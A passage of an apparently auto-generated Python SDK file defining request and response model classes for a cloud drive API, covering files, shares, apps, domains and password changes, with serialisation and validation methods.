stream_locations: dict = None,
streams_info: dict = None,
thumbnail: str = None,
trashed_at: str = None,
type: str = None,
updated_at: str = None,
upload_id: str = None,
url: str = None,
user_meta: str = None,
video_media_metadata: VideoMediaResponse = None,
video_preview_metadata: VideoPreviewResponse = None,
):
# category
self.category = category
# CharacteristicHash
self.characteristic_hash = characteristic_hash
# Content Hash
self.content_hash = content_hash
# content_hash_name
self.content_hash_name = content_hash_name
# content_type
self.content_type = content_type
# crc64_hash
self.crc_64hash = crc_64hash
# created_at
self.created_at = created_at
# description
self.description = description
# DomainID
self.domain_id = domain_id
# download_url
self.download_url = download_url
# drive_id
self.drive_id = drive_id
# encrypt_mode
self.encrypt_mode = encrypt_mode
# file_extension
self.file_extension = file_extension
# file_id
self.file_id = file_id
# Hidden
type: boolean
self.hidden = hidden
self.image_media_metadata = image_media_metadata
# labels
self.labels = labels
# location
self.location = location
self.meta = meta
# name
self.name = name
# parent_file_id
self.parent_file_id = parent_file_id
self.punish_flag = punish_flag
self.share_id = share_id
# Size
self.size = size
# starred
type: boolean
self.starred = starred
# status
self.status = status
self.stream_locations = stream_locations
# @Deprecated streams url info
self.streams_info = streams_info
# thumbnail
self.thumbnail = thumbnail
# trashed_at
self.trashed_at = trashed_at
# type
self.type = type
# updated_at
self.updated_at = updated_at
# upload_id
self.upload_id = upload_id
# url
self.url = url
# user_meta
self.user_meta = user_meta
self.video_media_metadata = video_media_metadata
self.video_preview_metadata = video_preview_metadata
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
if self.image_media_metadata:
self.image_media_metadata.validate()
self.validate_required(self.name, 'name')
if self.name is not None:
self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
if self.parent_file_id is not None:
self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
if self.size is not None:
self.validate_maximum(self.size, 'size', 53687091200)
self.validate_minimum(self.size, 'size', 0)
if self.video_media_metadata:
self.video_media_metadata.validate()
if self.video_preview_metadata:
self.video_preview_metadata.validate()
def to_map(self):
result = dict()
if self.category is not None:
result['category'] = self.category
if self.characteristic_hash is not None:
result['characteristic_hash'] = self.characteristic_hash
if self.content_hash is not None:
result['content_hash'] = self.content_hash
if self.content_hash_name is not None:
result['content_hash_name'] = self.content_hash_name
if self.content_type is not None:
result['content_type'] = self.content_type
if self.crc_64hash is not None:
result['crc64_hash'] = self.crc_64hash
if self.created_at is not None:
result['created_at'] = self.created_at
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.download_url is not None:
result['download_url'] = self.download_url
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.encrypt_mode is not None:
result['encrypt_mode'] = self.encrypt_mode
if self.file_extension is not None:
result['file_extension'] = self.file_extension
if self.file_id is not None:
result['file_id'] = self.file_id
if self.hidden is not None:
result['hidden'] = self.hidden
if self.image_media_metadata is not None:
result['image_media_metadata'] = self.image_media_metadata.to_map()
if self.labels is not None:
result['labels'] = self.labels
if self.location is not None:
result['location'] = self.location
if self.meta is not None:
result['meta'] = self.meta
if self.name is not None:
result['name'] = self.name
if self.parent_file_id is not None:
result['parent_file_id'] = self.parent_file_id
if self.punish_flag is not None:
result['punish_flag'] = self.punish_flag
if self.share_id is not None:
result['share_id'] = self.share_id
if self.size is not None:
result['size'] = self.size
if self.starred is not None:
result['starred'] = self.starred
if self.status is not None:
result['status'] = self.status
if self.stream_locations is not None:
result['stream_locations'] = self.stream_locations
if self.streams_info is not None:
result['streams_info'] = self.streams_info
if self.thumbnail is not None:
result['thumbnail'] = self.thumbnail
if self.trashed_at is not None:
result['trashed_at'] = self.trashed_at
if self.type is not None:
result['type'] = self.type
if self.updated_at is not None:
result['updated_at'] = self.updated_at
if self.upload_id is not None:
result['upload_id'] = self.upload_id
if self.url is not None:
result['url'] = self.url
if self.user_meta is not None:
result['user_meta'] = self.user_meta
if self.video_media_metadata is not None:
result['video_media_metadata'] = self.video_media_metadata.to_map()
if self.video_preview_metadata is not None:
result['video_preview_metadata'] = self.video_preview_metadata.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('category') is not None:
self.category = m.get('category')
if m.get('characteristic_hash') is not None:
self.characteristic_hash = m.get('characteristic_hash')
if m.get('content_hash') is not None:
self.content_hash = m.get('content_hash')
if m.get('content_hash_name') is not None:
self.content_hash_name = m.get('content_hash_name')
if m.get('content_type') is not None:
self.content_type = m.get('content_type')
if m.get('crc64_hash') is not None:
self.crc_64hash = m.get('crc64_hash')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('download_url') is not None:
self.download_url = m.get('download_url')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('encrypt_mode') is not None:
self.encrypt_mode = m.get('encrypt_mode')
if m.get('file_extension') is not None:
self.file_extension = m.get('file_extension')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('hidden') is not None:
self.hidden = m.get('hidden')
if m.get('image_media_metadata') is not None:
temp_model = ImageMediaResponse()
self.image_media_metadata = temp_model.from_map(m['image_media_metadata'])
if m.get('labels') is not None:
self.labels = m.get('labels')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('meta') is not None:
self.meta = m.get('meta')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('parent_file_id') is not None:
self.parent_file_id = m.get('parent_file_id')
if m.get('punish_flag') is not None:
self.punish_flag = m.get('punish_flag')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('starred') is not None:
self.starred = m.get('starred')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('stream_locations') is not None:
self.stream_locations = m.get('stream_locations')
if m.get('streams_info') is not None:
self.streams_info = m.get('streams_info')
if m.get('thumbnail') is not None:
self.thumbnail = m.get('thumbnail')
if m.get('trashed_at') is not None:
self.trashed_at = m.get('trashed_at')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
if m.get('url') is not None:
self.url = m.get('url')
if m.get('user_meta') is not None:
self.user_meta = m.get('user_meta')
if m.get('video_media_metadata') is not None:
temp_model = VideoMediaResponse()
self.video_media_metadata = temp_model.from_map(m['video_media_metadata'])
if m.get('video_preview_metadata') is not None:
temp_model = VideoPreviewResponse()
self.video_preview_metadata = temp_model.from_map(m['video_preview_metadata'])
return self
class ConfirmLinkRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
temporary_token: str = None,
):
self.headers = headers
# 待绑定的临时token,此token只能访问绑定、取消绑定接口
self.temporary_token = temporary_token
def validate(self):
self.validate_required(self.temporary_token, 'temporary_token')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.temporary_token is not None:
result['temporary_token'] = self.temporary_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('temporary_token') is not None:
self.temporary_token = m.get('temporary_token')
return self
class CopyFileResponse(TeaModel):
"""
文件拷贝 response
"""
def __init__(
self,
async_task_id: str = None,
domain_id: str = None,
drive_id: str = None,
file_id: str = None,
):
# async_task_id
self.async_task_id = async_task_id
# DomainID
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
# file_id
self.file_id = file_id
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
def to_map(self):
result = dict()
if self.async_task_id is not None:
result['async_task_id'] = self.async_task_id
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id is not None:
result['file_id'] = self.file_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('async_task_id') is not None:
self.async_task_id = m.get('async_task_id')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
return self
class CorsRule(TeaModel):
"""
*\
"""
def __init__(
self,
allowed_header: List[str] = None,
allowed_method: List[str] = None,
allowed_origin: List[str] = None,
expose_header: List[str] = None,
max_age_seconds: int = None,
):
# AllowedHeader
self.allowed_header = allowed_header
# AllowedMethod
self.allowed_method = allowed_method
# AllowedOrigin
self.allowed_origin = allowed_origin
# ExposeHeader
self.expose_header = expose_header
# MaxAgeSeconds
self.max_age_seconds = max_age_seconds
def validate(self):
pass
def to_map(self):
result = dict()
if self.allowed_header is not None:
result['allowed_header'] = self.allowed_header
if self.allowed_method is not None:
result['allowed_method'] = self.allowed_method
if self.allowed_origin is not None:
result['allowed_origin'] = self.allowed_origin
if self.expose_header is not None:
result['expose_header'] = self.expose_header
if self.max_age_seconds is not None:
result['max_age_seconds'] = self.max_age_seconds
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('allowed_header') is not None:
self.allowed_header = m.get('allowed_header')
if m.get('allowed_method') is not None:
self.allowed_method = m.get('allowed_method')
if m.get('allowed_origin') is not None:
self.allowed_origin = m.get('allowed_origin')
if m.get('expose_header') is not None:
self.expose_header = m.get('expose_header')
if m.get('max_age_seconds') is not None:
self.max_age_seconds = m.get('max_age_seconds')
return self
class CreateAppRequest(TeaModel):
"""
*\
"""
def __init__(
self,
app_name: str = None,
description: str = None,
is_third_party: bool = None,
logo: str = None,
public_key: str = None,
redirect_uri: str = None,
scope: List[str] = None,
type: str = None,
):
# App名称
self.app_name = app_name
# App描述
self.description = description
# 是否是domain私有App
self.is_third_party = is_third_party
# App图标
self.logo = logo
# RSA加密算法的公钥, PEM格式
self.public_key = public_key
# App回调地址
self.redirect_uri = redirect_uri
# App权限列表
self.scope = scope
# App类型
self.type = type
def validate(self):
self.validate_required(self.app_name, 'app_name')
if self.app_name is not None:
self.validate_max_length(self.app_name, 'app_name', 128)
if self.description is not None:
self.validate_max_length(self.description, 'description', 128)
self.validate_required(self.logo, 'logo')
self.validate_required(self.public_key, 'public_key')
self.validate_required(self.scope, 'scope')
self.validate_required(self.type, 'type')
def to_map(self):
result = dict()
if self.app_name is not None:
result['app_name'] = self.app_name
if self.description is not None:
result['description'] = self.description
if self.is_third_party is not None:
result['is_third_party'] = self.is_third_party
if self.logo is not None:
result['logo'] = self.logo
if self.public_key is not None:
result['public_key'] = self.public_key
if self.redirect_uri is not None:
result['redirect_uri'] = self.redirect_uri
if self.scope is not None:
result['scope'] = self.scope
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('app_name') is not None:
self.app_name = m.get('app_name')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('is_third_party') is not None:
self.is_third_party = m.get('is_third_party')
if m.get('logo') is not None:
self.logo = m.get('logo')
if m.get('public_key') is not None:
self.public_key = m.get('public_key')
if m.get('redirect_uri') is not None:
self.redirect_uri = m.get('redirect_uri')
if m.get('scope') is not None:
self.scope = m.get('scope')
if m.get('type') is not None:
self.type = m.get('type')
return self
class CreateDomainRequest(TeaModel):
"""
create domain request
"""
def __init__(
self,
auth_config: dict = None,
auth_dingding_app_id: str = None,
auth_dingding_app_secret: str = None,
auth_dingding_enable: bool = None,
auth_endpoint_enable: bool = None,
auth_ram_app_id: str = None,
auth_ram_app_secret: str = None,
auth_ram_enable: bool = None,
data_hash_name: str = None,
description: str = None,
domain_name: str = None,
event_filename_matches: str = None,
event_mns_endpoint: str = None,
event_mns_topic: str = None,
event_names: List[str] = None,
event_role_arn: str = None,
init_drive_enable: bool = None,
init_drive_size: int = None,
mode: str = None,
path_type: str = None,
published_app_access_strategy: AppAccessStrategy = None,
sharable: bool = None,
store_level: str = None,
store_region_list: List[str] = None,
):
# 登录相关信息
self.auth_config = auth_config
# 钉钉 App Id
self.auth_dingding_app_id = auth_dingding_app_id
# 钉钉 App Secret
self.auth_dingding_app_secret = auth_dingding_app_secret
# 启用钉钉认证
self.auth_dingding_enable = auth_dingding_enable
self.auth_endpoint_enable = auth_endpoint_enable
# RAM App Id
self.auth_ram_app_id = auth_ram_app_id
# RAM App Secret
self.auth_ram_app_secret = auth_ram_app_secret
# 启用 RAM 认证
self.auth_ram_enable = auth_ram_enable
# 数据 Hash 算法
self.data_hash_name = data_hash_name
# Domain 描述
self.description = description
# Domain 名称
self.domain_name = domain_name
# 事件通知 MNS 匹配文件名
self.event_filename_matches = event_filename_matches
# 事件通知 MNS Endpoint
self.event_mns_endpoint = event_mns_endpoint
# 事件通知 MNS Topic
self.event_mns_topic = event_mns_topic
# 事件名列表
self.event_names = event_names
# 事件通知 Role Arn
self.event_role_arn = event_role_arn
# 开启自动初始化 Drive
self.init_drive_enable = init_drive_enable
# 自动初始化 Drive 大小
self.init_drive_size = init_drive_size
# Domain 类型
self.mode = mode
# Domain 类型
self.path_type = path_type
self.published_app_access_strategy = published_app_access_strategy
# 开启分享
self.sharable = sharable
# 存储级别
self.store_level = store_level
# 存储 Region 列表
self.store_region_list = store_region_list
def validate(self):
self.validate_required(self.domain_name, 'domain_name')
self.validate_required(self.mode, 'mode')
if self.published_app_access_strategy:
self.published_app_access_strategy.validate()
self.validate_required(self.store_region_list, 'store_region_list')
def to_map(self):
result = dict()
if self.auth_config is not None:
result['auth_config'] = self.auth_config
if self.auth_dingding_app_id is not None:
result['auth_dingding_app_id'] = self.auth_dingding_app_id
if self.auth_dingding_app_secret is not None:
result['auth_dingding_app_secret'] = self.auth_dingding_app_secret
if self.auth_dingding_enable is not None:
result['auth_dingding_enable'] = self.auth_dingding_enable
if self.auth_endpoint_enable is not None:
result['auth_endpoint_enable'] = self.auth_endpoint_enable
if self.auth_ram_app_id is not None:
result['auth_ram_app_id'] = self.auth_ram_app_id
if self.auth_ram_app_secret is not None:
result['auth_ram_app_secret'] = self.auth_ram_app_secret
if self.auth_ram_enable is not None:
result['auth_ram_enable'] = self.auth_ram_enable
if self.data_hash_name is not None:
result['data_hash_name'] = self.data_hash_name
if self.description is not None:
result['description'] = self.description
if self.domain_name is not None:
result['domain_name'] = self.domain_name
if self.event_filename_matches is not None:
result['event_filename_matches'] = self.event_filename_matches
if self.event_mns_endpoint is not None:
result['event_mns_endpoint'] = self.event_mns_endpoint
if self.event_mns_topic is not None:
result['event_mns_topic'] = self.event_mns_topic
if self.event_names is not None:
result['event_names'] = self.event_names
if self.event_role_arn is not None:
result['event_role_arn'] = self.event_role_arn
if self.init_drive_enable is not None:
result['init_drive_enable'] = self.init_drive_enable
if self.init_drive_size is not None:
result['init_drive_size'] = self.init_drive_size
if self.mode is not None:
result['mode'] = self.mode
if self.path_type is not None:
result['path_type'] = self.path_type
if self.published_app_access_strategy is not None:
result['published_app_access_strategy'] = self.published_app_access_strategy.to_map()
if self.sharable is not None:
result['sharable'] = self.sharable
if self.store_level is not None:
result['store_level'] = self.store_level
if self.store_region_list is not None:
result['store_region_list'] = self.store_region_list
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('auth_config') is not None:
self.auth_config = m.get('auth_config')
if m.get('auth_dingding_app_id') is not None:
self.auth_dingding_app_id = m.get('auth_dingding_app_id')
if m.get('auth_dingding_app_secret') is not None:
self.auth_dingding_app_secret = m.get('auth_dingding_app_secret')
if m.get('auth_dingding_enable') is not None:
self.auth_dingding_enable = m.get('auth_dingding_enable')
if m.get('auth_endpoint_enable') is not None:
self.auth_endpoint_enable = m.get('auth_endpoint_enable')
if m.get('auth_ram_app_id') is not None:
self.auth_ram_app_id = m.get('auth_ram_app_id')
if m.get('auth_ram_app_secret') is not None:
self.auth_ram_app_secret = m.get('auth_ram_app_secret')
if m.get('auth_ram_enable') is not None:
self.auth_ram_enable = m.get('auth_ram_enable')
if m.get('data_hash_name') is not None:
self.data_hash_name = m.get('data_hash_name')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_name') is not None:
self.domain_name = m.get('domain_name')
if m.get('event_filename_matches') is not None:
self.event_filename_matches = m.get('event_filename_matches')
if m.get('event_mns_endpoint') is not None:
self.event_mns_endpoint = m.get('event_mns_endpoint')
if m.get('event_mns_topic') is not None:
self.event_mns_topic = m.get('event_mns_topic')
if m.get('event_names') is not None:
self.event_names = m.get('event_names')
if m.get('event_role_arn') is not None:
self.event_role_arn = m.get('event_role_arn')
if m.get('init_drive_enable') is not None:
self.init_drive_enable = m.get('init_drive_enable')
if m.get('init_drive_size') is not None:
self.init_drive_size = m.get('init_drive_size')
if m.get('mode') is not None:
self.mode = m.get('mode')
if m.get('path_type') is not None:
self.path_type = m.get('path_type')
if m.get('published_app_access_strategy') is not None:
temp_model = AppAccessStrategy()
self.published_app_access_strategy = temp_model.from_map(m['published_app_access_strategy'])
if m.get('sharable') is not None:
self.sharable = m.get('sharable')
if m.get('store_level') is not None:
self.store_level = m.get('store_level')
if m.get('store_region_list') is not None:
self.store_region_list = m.get('store_region_list')
return self
class CreateDriveResponse(TeaModel):
"""
Create drive response
"""
def __init__(
self,
domain_id: str = None,
drive_id: str = None,
):
# Domain ID
self.domain_id = domain_id
# Drive ID
self.drive_id = drive_id
def validate(self):
pass
def to_map(self):
result = dict()
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
return self
class UploadPartInfo(TeaModel):
"""
*\
"""
def __init__(
self,
content_type: str = None,
etag: str = None,
part_number: int = None,
part_size: int = None,
upload_url: str = None,
):
self.content_type = content_type
# etag
self.etag = etag
# PartNumber
self.part_number = part_number
# PartSize:
self.part_size = part_size
# upload_url
self.upload_url = upload_url
def validate(self):
if self.part_number is not None:
self.validate_maximum(self.part_number, 'part_number', 10000)
self.validate_minimum(self.part_number, 'part_number', 1)
if self.part_size is not None:
self.validate_maximum(self.part_size, 'part_size', 5368709120)
self.validate_minimum(self.part_size, 'part_size', 102400)
def to_map(self):
result = dict()
if self.content_type is not None:
result['content_type'] = self.content_type
if self.etag is not None:
result['etag'] = self.etag
if self.part_number is not None:
result['part_number'] = self.part_number
if self.part_size is not None:
result['part_size'] = self.part_size
if self.upload_url is not None:
result['upload_url'] = self.upload_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('content_type') is not None:
self.content_type = m.get('content_type')
if m.get('etag') is not None:
self.etag = m.get('etag')
if m.get('part_number') is not None:
self.part_number = m.get('part_number')
if m.get('part_size') is not None:
self.part_size = m.get('part_size')
if m.get('upload_url') is not None:
self.upload_url = m.get('upload_url')
return self
class CreateFileResponse(TeaModel):
"""
Create file response
"""
def __init__(
self,
domain_id: str = None,
drive_id: str = None,
encrypt_mode: str = None,
exist: bool = None,
file_id: str = None,
file_name: str = None,
location: str = None,
parent_file_id: str = None,
part_info_list: List[UploadPartInfo] = None,
rapid_upload: bool = None,
status: str = None,
streams_upload_info: dict = None,
type: str = None,
upload_id: str = None,
):
# domain_id
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
# encrypt_mode
self.encrypt_mode = encrypt_mode
# exist
type: boolean
self.exist = exist
# file_id
self.file_id = file_id
# file_name
self.file_name = file_name
# location
self.location = location
# parent_file_id
self.parent_file_id = parent_file_id
# part_info_list
self.part_info_list = part_info_list
# rapid_upload
type: boolean
self.rapid_upload = rapid_upload
# status
self.status = status
# streams_upload_info
self.streams_upload_info = streams_upload_info
# type
self.type = type
# upload_id
self.upload_id = upload_id
def validate(self):
if self.domain_id is not None:
self.validate_max_length(self.domain_id, 'domain_id', 50)
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9]{1,50}')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
if self.file_name is not None:
self.validate_max_length(self.file_name, 'file_name', 255)
if self.parent_file_id is not None:
self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
if self.part_info_list:
for k in self.part_info_list:
if k:
k.validate()
def to_map(self):
result = dict()
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.encrypt_mode is not None:
result['encrypt_mode'] = self.encrypt_mode
if self.exist is not None:
result['exist'] = self.exist
if self.file_id is not None:
result['file_id'] = self.file_id
if self.file_name is not None:
result['file_name'] = self.file_name
if self.location is not None:
result['location'] = self.location
if self.parent_file_id is not None:
result['parent_file_id'] = self.parent_file_id
result['part_info_list'] = []
if self.part_info_list is not None:
for k in self.part_info_list:
result['part_info_list'].append(k.to_map() if k else None)
if self.rapid_upload is not None:
result['rapid_upload'] = self.rapid_upload
if self.status is not None:
result['status'] = self.status
if self.streams_upload_info is not None:
result['streams_upload_info'] = self.streams_upload_info
if self.type is not None:
result['type'] = self.type
if self.upload_id is not None:
result['upload_id'] = self.upload_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('encrypt_mode') is not None:
self.encrypt_mode = m.get('encrypt_mode')
if m.get('exist') is not None:
self.exist = m.get('exist')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('file_name') is not None:
self.file_name = m.get('file_name')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('parent_file_id') is not None:
self.parent_file_id = m.get('parent_file_id')
self.part_info_list = []
if m.get('part_info_list') is not None:
for k in m.get('part_info_list'):
temp_model = UploadPartInfo()
self.part_info_list.append(temp_model.from_map(k))
if m.get('rapid_upload') is not None:
self.rapid_upload = m.get('rapid_upload')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('streams_upload_info') is not None:
self.streams_upload_info = m.get('streams_upload_info')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
return self
class CreateShareLinkResponse(TeaModel):
"""
create_share_link response
"""
def __init__(
self,
description: str = None,
share_id: str = None,
share_msg: str = None,
share_name: str = None,
share_policy: str = None,
share_pwd: str = None,
share_url: str = None,
):
# description
self.description = description
# share_id
self.share_id = share_id
# share_msg
self.share_msg = share_msg
# share_name
self.share_name = share_name
# share_policy
self.share_policy = share_policy
# share_pwd
self.share_pwd = share_pwd
# share_url
self.share_url = share_url
def validate(self):
pass
def to_map(self):
result = dict()
if self.description is not None:
result['description'] = self.description
if self.share_id is not None:
result['share_id'] = self.share_id
if self.share_msg is not None:
result['share_msg'] = self.share_msg
if self.share_name is not None:
result['share_name'] = self.share_name
if self.share_policy is not None:
result['share_policy'] = self.share_policy
if self.share_pwd is not None:
result['share_pwd'] = self.share_pwd
if self.share_url is not None:
result['share_url'] = self.share_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('description') is not None:
self.description = m.get('description')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('share_msg') is not None:
self.share_msg = m.get('share_msg')
if m.get('share_name') is not None:
self.share_name = m.get('share_name')
if m.get('share_policy') is not None:
self.share_policy = m.get('share_policy')
if m.get('share_pwd') is not None:
self.share_pwd = m.get('share_pwd')
if m.get('share_url') is not None:
self.share_url = m.get('share_url')
return self
class CreateShareResponse(TeaModel):
"""
Create share response
"""
def __init__(
self,
domain_id: str = None,
share_id: str = None,
):
# domain_id
self.domain_id = domain_id
# share_id
self.share_id = share_id
def validate(self):
pass
def to_map(self):
result = dict()
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.share_id is not None:
result['share_id'] = self.share_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
return self
class DefaultChangePasswordRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
app_id: str = None,
encrypted_key: str = None,
new_password: str = None,
phone_number: str = None,
phone_region: str = None,
state: str = None,
):
self.headers = headers
# App ID, 当前访问的App
self.app_id = app_id
# AES-256对称加密密钥,通过App公钥加密后传输
self.encrypted_key = encrypted_key
# 新密码,必须包含数字和字母,长度8-20个字符
self.new_password = new_password
# 手机号
self.phone_number = phone_number
# 国家编号,默认86,不需要填+号,直接填数字
self.phone_region = phone_region
# 修改密码的临时授权码
self.state = state
def validate(self):
self.validate_required(self.app_id, 'app_id')
self.validate_required(self.encrypted_key, 'encrypted_key')
self.validate_required(self.new_password, 'new_password')
self.validate_required(self.phone_number, 'phone_number')
self.validate_required(self.state, 'state')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.app_id is not None:
result['app_id'] = self.app_id
if self.encrypted_key is not None:
result['encrypted_key'] = self.encrypted_key
if self.new_password is not None:
result['new_password'] = self.new_password
if self.phone_number is not None:
result['phone_number'] = self.phone_number
if self.phone_region is not None:
result['phone_region'] = self.phone_region
if self.state is not None:
result['state'] = self.state
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('encrypted_key') is not None:
self.encrypted_key = m.get('encrypted_key')
if m.get('new_password') is not None:
self.new_password = m.get('new_password')
if m.get('phone_number') is not None:
self.phone_number = m.get('phone_number')
if m.get('phone_region') is not None:
self.phone_region = m.get('phone_region')
if m.get('state') is not None:
self.state = m.get('state')
return self
class DefaultSetPasswordRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
app_id: str = None,
encrypted_key: str = None,
new_password: str = None,
state: str = None,
):
self.headers = headers
# App ID, 当前访问的App
self.app_id = app_id
# AES-256对称加密密钥,通过App公钥加密后传输
self.encrypted_key = encrypted_key
# 新密码,必须包含数字和字母,长度8-20个字符,使用AES-256对称加密后传输(CBC模式, 填充算法为PKCS7Padding,生成base64字符串)
self.new_password = new_password
# 修改密码的临时授权码
self.state = state
def validate(self):
self.validate_required(self.app_id, 'app_id')
self.validate_required(self.encrypted_key, 'encrypted_key')
self.validate_required(self.new_password, 'new_password')
self.validate_required(self.state, 'state')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.app_id is not None:
result['app_id'] = self.app_id
if self.encrypted_key is not None:
result['encrypted_key'] = self.encrypted_key
if self.new_password is not None:
result['new_password'] = self.new_password
if self.state is not None:
result['state'] = self.state
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('encrypted_key') is not None:
self.encrypted_key = m.get('encrypted_key')
if m.get('new_password') is not None:
self.new_password = m.get('new_password')
if m.get('state') is not None:
self.state = m.get('state')
return self
class DeleteAppRequest(TeaModel):
"""
*\
"""
def __init__(
self,
app_id: str = None,
):
# App ID
self.app_id = app_id
def validate(self):
self.validate_required(self.app_id, 'app_id')
def to_map(self):
result = dict()
if self.app_id is not None:
result['app_id'] = self.app_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
return self
class DeleteBizCNameAndCertRequest(TeaModel):
"""
*\
"""
def __init__(
self,
biz_cname: str = None,
cname_type: str = None,
domain_id: str = None,
is_vpc: bool = None,
):
# api cname
self.biz_cname = biz_cname
# cname type
self.cname_type = cname_type
# domain ID
self.domain_id = domain_id
# vpc
self.is_vpc = is_vpc
def validate(self):
self.validate_required(self.cname_type, 'cname_type')
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
if self.biz_cname is not None:
result['biz_cname'] = self.biz_cname
if self.cname_type is not None:
result['cname_type'] = self.cname_type
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.is_vpc is not None:
result['is_vpc'] = self.is_vpc
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('biz_cname') is not None:
self.biz_cname = m.get('biz_cname')
if m.get('cname_type') is not None:
self.cname_type = m.get('cname_type')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('is_vpc') is not None:
self.is_vpc = m.get('is_vpc')
return self
class DeleteBizCNameCertRequest(TeaModel):
"""
*\
"""
def __init__(
self,
biz_cname: str = None,
cert_id: str = None,
cname_type: str = None,
domain_id: str = None,
is_vpc: bool = None,
):
# biz cname
self.biz_cname = biz_cname
# cert id
self.cert_id = cert_id
# cname type
self.cname_type = cname_type
# domain ID
self.domain_id = domain_id
# is vpc
self.is_vpc = is_vpc
def validate(self):
self.validate_required(self.cname_type, 'cname_type')
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
if self.biz_cname is not None:
result['biz_cname'] = self.biz_cname
if self.cert_id is not None:
result['cert_id'] = self.cert_id
if self.cname_type is not None:
result['cname_type'] = self.cname_type
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.is_vpc is not None:
